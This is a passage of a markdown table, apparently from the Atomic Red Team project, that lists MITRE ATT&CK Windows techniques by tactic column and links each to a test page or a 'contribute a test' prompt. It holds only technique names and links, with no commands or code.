| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
| | Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Software Discovery](../../T1518/T1518.md) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Indirect Command Execution](../../T1202/T1202.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Masquerading](../../T1036/T1036.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | [Time Providers](../../T1547.003/T1547.003.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Process Injection](../../T1055/T1055.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forced Authentication](../../T1187/T1187.md) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
| | | Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) | | | | | | |
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) | | | | | | |
| | | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
| | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
| | | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | [Account Manipulation](../../T1098/T1098.md) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [IIS Components](../../T1505.004/T1505.004.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution](../../T1546/T1546.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | [Authentication Package](../../T1547.002/T1547.002.md) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [BITS Jobs](../../T1197/T1197.md) | | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
| | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | | [Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Indicator Removal on Host: Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
| | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Run Virtual Instance](../../T1564.006/T1564.006.md) | | | | | | | |
| | | | | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
| | | | | [Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
| | | | | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Binary Proxy Execution: Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
| | | | | [Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | | | [Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [BITS Jobs](../../T1197/T1197.md) | | | | | | | |
| | | | | [Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | | | Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
